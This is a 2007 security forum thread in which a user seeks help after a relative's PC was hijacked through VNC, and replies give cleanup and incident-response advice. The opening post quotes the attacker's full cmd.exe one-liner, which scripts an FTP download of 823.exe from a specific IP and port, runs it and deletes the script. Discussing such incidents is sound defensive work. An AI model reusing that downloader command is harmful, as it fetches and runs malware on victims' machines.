.

Help... Worm?

<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sat Mar 24, 2007 9:50 pm

Help... Worm?

Hey guys,

My brother-in-law just called me frantically saying his computer had been hacked. He was in a remote session to his computer from work using VNC when he suddenly lost, and could not regain, the connection.

When he got home, he noticed that when he clicked start > run, the last command was:

  Code:
cmd.exe /c del i&echo open 24.158.178.152 27206 > i&echo user 1 1 >> i &echo get 823.exe >> i &echo quit >> i &ftp -n -s:i &823.exe&del i&exit


Now, if you connect to that IP on that port, you'll be greated with "220 Reptile welcomes you.." which looks like a standard FTP greeting, but accepts no commands. Everything I enter I receive a 503 command unknown. Also, none of his system commands are working (ie. cd, netstat, ipconfig, etc.). Sounds sorta like a rootkit.

Any suggestions?
<<

LSOChris

Post Sat Mar 24, 2007 9:59 pm

Re: Help... Worm?

unplug network cable...

from another computer download linux distro of your choice...

burn disc...

stick in hacked computer and reboot :-)

seriously though, do #1 and starting running your AV and rootkit finder tools to try to find out what 823.exe did or is still doing. hopefully you can clean it up but it might be time to back up (and be careful! what you backup) and reinstall. 
<<

heffnercj

EH-Net Columnist
EH-Net Columnist

Posts: 69

Joined: Thu Mar 15, 2007 2:45 pm

Post Sat Mar 24, 2007 10:01 pm

Re: Help... Worm?

Found a discussion at SecurityFocus that might be related...the app discussed here had the same 220 string:

http://www.securityfocus.com/archive/10 ... 0/threaded
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sat Mar 24, 2007 10:16 pm

Re: Help... Worm?

Thanks guys (quick reply too!).

That's what I had suggested pretty much. He's working on it offline now I believe (he's in a different state). I saw that link as well. That leads me to believe that the IP listed in the command is that of a system hosting the worm then, right? Also, so far AVG and Norton have not picked up anything. I haven't been able to locate anything on '823' as of yet.
<<

Kevan

User avatar

Jr. Member
Jr. Member

Posts: 95

Joined: Fri Mar 16, 2007 7:20 pm

Post Sun Mar 25, 2007 9:25 am

Re: Help... Worm?

Norton is horrible. I downloaded Clamwin onto my parents computer running Windows, and it found 9024 infected/viruses in their computer. I put them in a quarentine folder and scanned it with Norton-it never found anything.
I may be a newbie, but I am willing to learn.
<<

Cutaway

User avatar

Jr. Member
Jr. Member

Posts: 96

Joined: Mon Nov 20, 2006 5:02 pm

Post Sun Mar 25, 2007 11:48 am

Re: Help... Worm?

Not sure if you have identified how the system was compromised or how privileges were escalated.  Milw0rm has an exploit for 823.c but it is for "Dream FTP" and it does not appear to be a local exploit.  You can find the source: http://www.milw0rm.org/exploits/823

Once you have cleaned the system you are going to want to identify how the system was compromised before you put it back online.  You will want to also check any systems that are located on the same network as they might have been the source of the intrusion or may have fallen victim to attacks from this system.  If the other systems are rooted then you may need to resort to monitoring network traffic.

One thing you might consider is backing up all of the business files and reloading the system.  Sometimes this is the best way to handle incidents involving rootkits.  By storing files to a separate media and then scanning them from a separate, protected, system you can be sure that there is no "detectable" malware in these files.  Then you can DBNuke the old hard drive and get rid of anything except for firmware related malware which is highly unlikely.

Just throwing options out there for you to consider as you help your friend with additional risk analysis.

Good luck,
Cutaway
Go forth and do good things,
Cutaway
<<

plik

Newbie
Newbie

Posts: 31

Joined: Tue Dec 19, 2006 9:32 am

Location: North - UK

Post Sun Mar 25, 2007 1:42 pm

Re: Help... Worm?

As far as I'm aware (I'm sure someone will correct me if I'm wrong) commands only appear in start > run if they've been run from there. So someone had access to his desktop.

There has been a large increase in scanning for VNC servers recently, so I would suspect that was point of entry.
<<

Cutaway

User avatar

Jr. Member
Jr. Member

Posts: 96

Joined: Mon Nov 20, 2006 5:02 pm

Post Sun Mar 25, 2007 7:44 pm

Re: Help... Worm?

commands only appear in start > run if they've been run from there.


That is actually a very good point.  If this is the case then either the VNC connection was exploited or, more probably, brute forced.  The cracker apparently had a VNC connection to the system.  This system then could have been used to compromise another system using 823.exe or to escalate privileges on the local host.

If your brother-in-law is like most people he might be using this password or something like it on multiple places.  He may want to change ALL of his passwords to something completely different.
Go forth and do good things,
Cutaway
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sun Mar 25, 2007 9:55 pm

Re: Help... Worm?

Thanks again for all of the great tips. All are very helpful and much appreciated. I will pass the information along to my brother-in-law. I haven't heard back from a couple of emails I sent, so I'm not sure what course of action he's taken.

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software